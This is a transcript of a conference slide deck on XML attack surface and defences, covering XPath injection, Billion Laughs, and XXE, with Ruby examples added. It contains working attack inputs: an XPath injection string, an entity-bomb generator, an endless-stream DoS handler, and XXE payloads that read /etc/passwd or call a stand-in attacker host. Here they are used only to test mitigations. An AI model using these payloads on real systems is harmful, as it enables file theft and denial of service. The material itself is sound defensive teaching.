Devouring Security XML Attack surface and Defences


Agenda:



· XML today

· XML/XPath injection - Demo

· Compiled XPath queries

· DTD use and abuse

- document validations

- entity expansions

- denial of service - Demo

- arbitrary URI access (egress)

- parameters

- file enumeration and theft - Demo

- CSRF on internal systems - Demo?

· Framework defaults limits/restrictions

· Mitigations

· Lessons learned

· Verifying your XML systems for potential threats

Note:

1. Every topic comes with sample code for the exploit and for its prevention, language (C#, Java, PHP) and platform (Windows/Linux) agnostic wherever possible.

2. It is imperative at this point that you are aware of most attack scenarios against XML: the framework defaults may not protect you, so you may be vulnerable and simply not have found it yet.

3. The session is biased towards DTD abuse in XML systems, because the injection concepts and their remediation are much the same for XML as for SQL injection.



  1. Devouring Security: XML Attack surface and Defences. Marudhamaran Gunasekaran. Watch the screen recording of the presentation at http://vimeo.com/94209532
  2. Overreacting to Risk. "I understand the natural human disgust reaction, but do these people actually think that their normal drinking water is any more pure? That a single human is that much worse than all the normal birds and other animals? A few ounces distributed amongst 38 million gallons is negligible." - Bruce Schneier, https://www.schneier.com/blog/archives/2014/04/overreacting_to_1.html
  3. Disclaimer. Techniques and tools in this presentation should be used or applied to an application only with the prior consent of the application's owner. It is illegal otherwise.
  4. XML today • Network protocols: SOAP, XML-RPC, REST • Data exchange: modern databases • Configuration files: Java beans, .Net config, ... • Document/image formats: SVG, RSS, Atom
  5. XML injection demo: http://XmlAttacks:8080/WebGoat/attack
  6. XPath injection anatomy
  7. Blind XPath injection exists as well. More: https://www.owasp.org/index.php/Blind_XPath_Injection and http://dl.packetstormsecurity.net/papers/bypass/Blind_XPath_Injection_20040518.pdf
  8. Mitigations • Rejecting requests that contain XPath metacharacters: < > / ' = " • Variables with XSLT transformation • LINQ to XML without XPath queries (.Net) • XQuery implementations (Saxon for Java and .Net)
  9. XPath injection mitigation with XPathVariableResolver (Java)
  10. XPath injection mitigation with XPathVariableResolver (Java): XPath with variables
  11. XPath injection mitigation with IXsltContextVariable (.Net): XPath with variables
  12. XPath injection mitigation with IXsltContextVariable (.Net): XPath with variables
  13. XPath injection mitigation with input filtering
  14. XPath injection mitigation with LINQ to XML (.Net) • LINQ to XML still evaluating XPath: injection vulnerable • LINQ to XML without XPath: injection proof
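The vulnerable pattern from the demo and the three mitigations from slides 9 to 14 side by side, as an added example in Ruby using REXML from the standard library. This is not code from the talk (its own samples are Java and C#); the user store, the names and the passwords are constructed for the example.

```ruby
require "rexml/document"

# Constructed user store standing in for the XML the WebGoat demo queries.
USERS_XML = <<~XML
  <users>
    <user><name>alice</name><password>alice-pw</password></user>
    <user><name>bob</name><password>bob-pw</password></user>
  </users>
XML
USERS = REXML::Document.new(USERS_XML)

# Vulnerable: the untrusted name is spliced into the XPath expression, so a
# value such as  x' or '1'='1  turns the predicate into one that matches
# every user, exactly as string-built SQL does.
def passwords_vulnerable(name)
  REXML::XPath.match(USERS, "//user[name='#{name}']/password").map(&:text)
end

# Mitigation 1 (slides 9-12, XPathVariableResolver / IXsltContextVariable):
# bind the value to the XPath variable $name. The expression is fixed and the
# value is never parsed as XPath, so quotes and operators in it are plain data.
def passwords_with_variable(name)
  REXML::XPath.match(USERS, "//user[name=$name]/password", {}, { "name" => name })
              .map(&:text)
end

# Mitigation 2 (slide 13, input filtering): allowlist the value before it can
# reach the expression builder. Anything outside the allowlist is an error,
# not a query.
def passwords_filtered(name)
  raise ArgumentError, "invalid user name" unless name.match?(/\A[a-z0-9_]{1,32}\z/)
  passwords_vulnerable(name) # only safe because of the check above
end

# Mitigation 3 (slide 14, LINQ to XML without XPath): no dynamic XPath at all.
# Select with a fixed path and compare the value in ordinary Ruby.
def passwords_without_xpath(name)
  USERS.root.get_elements("user")
       .select { |u| u.elements["name"].text == name }
       .map    { |u| u.elements["password"].text }
end

if __FILE__ == $PROGRAM_NAME
  payload = "x' or '1'='1"
  p passwords_vulnerable(payload)    # => ["alice-pw", "bob-pw"]
  p passwords_with_variable(payload) # => []
  p passwords_without_xpath(payload) # => []
end
```

Variables are the general fix: they work for any value, including names that legitimately contain quotes. Input filtering only works when the allowed alphabet is genuinely that narrow, and it must run before the string is built, not on the finished expression.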
  15. DTDs • Document Type Definition
  16. Document Type Definition
  17. Entity declarations: http://www.xmlmaster.org/en/article/d01/c03/
  18. Billion Laughs (aka XML bomb): http://en.wikipedia.org/wiki/Billion_laughs
  19. Billion Laughs (demo)
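The bomb from slide 18, built and then parsed under a framework's default limits, as an added example in Ruby with REXML from the standard library. It is not part of the talk; REXML's defaults stand in for the .Net and JAXP defaults the later slides discuss, and the benign document with one entity is constructed.

```ruby
require "rexml/document"

# Build the Billion Laughs document. The classic form has depth 9 and fan-out
# 10: about 1 KB of input that expands to 10^9 copies of "lol".
def billion_laughs(depth = 9, fanout = 10)
  decls = ['<!ENTITY lol "lol">']
  (1..depth).each do |i|
    prev = i == 1 ? "lol" : "lol#{i - 1}"
    refs = "&#{prev};" * fanout
    decls << %(<!ENTITY lol#{i} "#{refs}">)
  end
  <<~XML
    <?xml version="1.0"?>
    <!DOCTYPE lolz [
    #{decls.join("\n")}
    ]>
    <lolz>&lol#{depth};</lolz>
  XML
end

# Bytes the root text would occupy if the parser expanded everything.
def expanded_size(depth = 9, fanout = 10)
  3 * fanout**depth # "lol" is 3 bytes
end

# The framework defaults this parser ships with: a cap on the number of
# entity expansions and a cap on the expanded text size.
def rexml_limits
  { expansions: REXML::Security.entity_expansion_limit,
    text_bytes: REXML::Security.entity_expansion_text_limit }
end

# Parse and then touch the root text, which is when REXML expands entities.
# Crossing either limit raises a RuntimeError instead of allocating gigabytes,
# so the caller gets a rejection, not a dead process.
def expand_root_text(xml)
  doc = REXML::Document.new(xml)
  [:ok, doc.root.text]
rescue RuntimeError => e # REXML::ParseException is a RuntimeError subclass
  [:rejected, e.message]
end

# Constructed document with a single, harmless internal entity.
BENIGN = <<~XML
  <!DOCTYPE quote [<!ENTITY co "Contoso">]>
  <quote>&co; stock</quote>
XML

if __FILE__ == $PROGRAM_NAME
  p rexml_limits
  p expanded_size                       # => 3000000000
  p expand_root_text(BENIGN)            # => [:ok, "Contoso stock"]
  p expand_root_text(billion_laughs)[0] # => :rejected
end
```

The rejection is the point of the "framework defaults" agenda item: this parser fails closed out of the box, while slide 24 shows that the .Net framework of the time did not on every build. Whatever parser you use, send it this document and confirm you get an error, not a memory spike.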
  20. External entity expansion: http://msdn.microsoft.com/en-us/magazine/ee335713.aspx
      An external entity makes the parser fetch a URL the attacker chooses:

      <!ENTITY stockprice SYSTEM "http://www.contoso.com/currentstockprice.ashx">

      If the endpoint behind that URL never finishes responding, a parser that resolves the entity keeps reading 'A's until it runs out of memory or time. The ASP.NET handler from the MSDN article:

      using System.Web;

      public class DoS : IHttpHandler
      {
          public void ProcessRequest(HttpContext context)
          {
              context.Response.ContentType = "text/plain";
              // One megabyte of 'A' ...
              byte[] data = new byte[1000000];
              for (int i = 0; i < data.Length; i++)
              {
                  data[i] = (byte)'A';
              }
              // ... streamed to the client forever.
              while (true)
              {
                  context.Response.OutputStream.Write(data, 0, data.Length);
                  context.Response.Flush();
              }
          }

          public bool IsReusable
          {
              get { return false; }
          }
      }
  21. External entity expansion mitigation (.Net)
      Potentially vulnerable: XmlDocument.LoadXml processes the DTD and, with its default XmlResolver, resolves external entities.

      XmlDocument xmlDoc = new XmlDocument();
      xmlDoc.LoadXml(xmlInput);

      Mitigated: read through an XmlTextReader with DTDs prohibited. ProhibitDtd is the .Net 2.0/3.5 property; on .Net 4.0 and later use reader.DtdProcessing = DtdProcessing.Prohibit, and set xmlDoc.XmlResolver = null so nothing external is fetched.

      XmlDocument xmlDoc = new XmlDocument();
      XmlTextReader reader = new XmlTextReader(new MemoryStream(Encoding.UTF8.GetBytes(xmlInput)));
      reader.ProhibitDtd = true;
      xmlDoc.Load(reader);
  22. External entity expansion mitigation (JAXP)
  23. Directory browsing and file access (JAXB). Prevented by turning off DTD support and external entities on the StAX reader that JAXB unmarshals from:

      import javax.xml.bind.*;
      import javax.xml.stream.*;
      import javax.xml.transform.stream.StreamSource;

      public class Demo {
          public static void main(String[] args) throws Exception {
              // Customer is the JAXB-annotated class being unmarshalled (not shown on the slide).
              JAXBContext jc = JAXBContext.newInstance(Customer.class);

              // Harden the StAX factory before creating any reader from it.
              XMLInputFactory xif = XMLInputFactory.newFactory();
              xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
              xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);
              XMLStreamReader xsr = xif.createXMLStreamReader(new StreamSource("src/xxe/input.xml"));

              // Unmarshal from the hardened reader, never from the raw file.
              Unmarshaller unmarshaller = jc.createUnmarshaller();
              Customer customer = (Customer) unmarshaller.unmarshal(xsr);

              Marshaller marshaller = jc.createMarshaller();
              marshaller.setProperty(Marshaller.JAXB_FORMATTED_OUTPUT, true);
              marshaller.marshal(customer, System.out);
          }
      }

      More: http://stackoverflow.com/questions/12977299/preven-xxe-attack-with-jaxb
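The DTD abuses on the agenda (arbitrary URI access for egress, file theft, parameter entities pulling an external DTD) as constructed payloads, behind a fail-closed guard that does for any parser what ProhibitDtd and SUPPORT_DTD=false do for the .Net and JAXP readers above. This is an added example in Ruby with REXML, not the talk's code; the hostname attacker.invalid and all document contents are made up. It also covers a caveat the slides do not: the check runs on decoded text, so a UTF-16 request body cannot hide the DOCTYPE from a byte-oriented filter.

```ruby
require "rexml/document"

# Constructed payloads for the three DTD abuses (attacker.invalid is a made-up host).
XXE_FILE   = %(<?xml version="1.0"?><!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><r>&xxe;</r>)
XXE_EGRESS = %(<?xml version="1.0"?><!DOCTYPE r [<!ENTITY xxe SYSTEM "http://attacker.invalid/probe">]><r>&xxe;</r>)
XXE_PARAM  = %(<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % ext SYSTEM "http://attacker.invalid/evil.dtd"> %ext;]><r/>)
# Constructed document that should pass.
CLEAN      = %(<?xml version="1.0"?><order><item sku="A1">1</item></order>)

class DtdProhibited < StandardError; end

# Decode the request body to UTF-8 before looking at it. A UTF-16 body (with
# or without a byte-order mark) would otherwise sail past a search for the
# ASCII bytes of "<!DOCTYPE".
def to_utf8(bytes)
  b = bytes.b
  if b.start_with?("\xFF\xFE".b)
    b[2..].force_encoding("UTF-16LE").encode("UTF-8")
  elsif b.start_with?("\xFE\xFF".b)
    b[2..].force_encoding("UTF-16BE").encode("UTF-8")
  elsif b.start_with?("<\x00".b)        # BOM-less UTF-16LE: "<" then NUL
    b.force_encoding("UTF-16LE").encode("UTF-8")
  elsif b.start_with?("\x00<".b)        # BOM-less UTF-16BE: NUL then "<"
    b.force_encoding("UTF-16BE").encode("UTF-8")
  else
    b = b[3..] if b.start_with?("\xEF\xBB\xBF".b) # drop a UTF-8 BOM
    s = b.force_encoding("UTF-8")
    raise ArgumentError, "input is not valid UTF-8 or UTF-16" unless s.valid_encoding?
    s
  end
end

# Fail closed: any DOCTYPE or ENTITY declaration anywhere in the decoded
# text, in any letter case, rejects the document. An ENTITY can only occur
# inside a DOCTYPE, so the second token is belt and braces for lenient
# parsers. A false positive on a comment containing the literal string is
# an acceptable price for a check that cannot be argued with.
def doctype_present?(xml)
  xml.match?(/<!(DOCTYPE|ENTITY)/i)
end

# The only entry point application code should use for untrusted XML.
def parse_untrusted(bytes)
  xml = to_utf8(bytes)
  raise DtdProhibited, "DOCTYPE is not allowed in this input" if doctype_present?(xml)
  # If the declaration names an encoding, it must match what the parser is
  # fed; the constructed inputs here declare none, so the UTF-8 text is fine.
  REXML::Document.new(xml)
end

def root_name(bytes)
  parse_untrusted(bytes).root.name
rescue DtdProhibited
  :rejected
end

if __FILE__ == $PROGRAM_NAME
  p root_name(XXE_FILE)                              # => :rejected
  p root_name(XXE_FILE.encode("UTF-16BE"))           # => :rejected
  p root_name(CLEAN)                                 # => "order"
end
```

This guard never decides whether an entity is "safe"; it removes the DTD from the attack surface entirely, which is the same decision ProhibitDtd, DtdProcessing.Prohibit and SUPPORT_DTD=false make. If a system genuinely needs DTDs, the fallback is the parser's own expansion limits plus a resolver that refuses to fetch anything, as on the slides above.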
  24. DoS attack and safe/vulnerable .Net versions
      Safe:
        .Net framework 2.0.50727.5477 or higher
        .Net framework 4.0.30319.34011 or higher
      Vulnerable:
        .Net framework 2.0.50727.5420 or lower
        .Net framework 4.0.30319.1 or lower
      Safe or vulnerable? (not determined in the talk)
        .Net framework 2.0, revisions 5420 to 5476
        .Net framework 4.0, revisions 1 to 34010
  25. Lessons learned 1. Keep your operating systems and frameworks up to date. 2. Don't let your server headers reveal too much information. 3. Be vigilant about the framework's default settings.
  26. References / further reading
      • http://www.lynda.com/XML-tutorials/Understanding-XML-usage-today/782/47912-4.html
      • http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3925
      • http://secpod.org/blog/?p=1337
      • http://2013.appsecusa.org/2013/wp-content/uploads/2013/12/WhatYouDidntKnowAboutXXEAttacks.pdf
      • https://www.owasp.org/index.php/XPATH_Injection_Java
      • https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=61407250
      • http://www.xmlmaster.org/en/article/d01/c03/
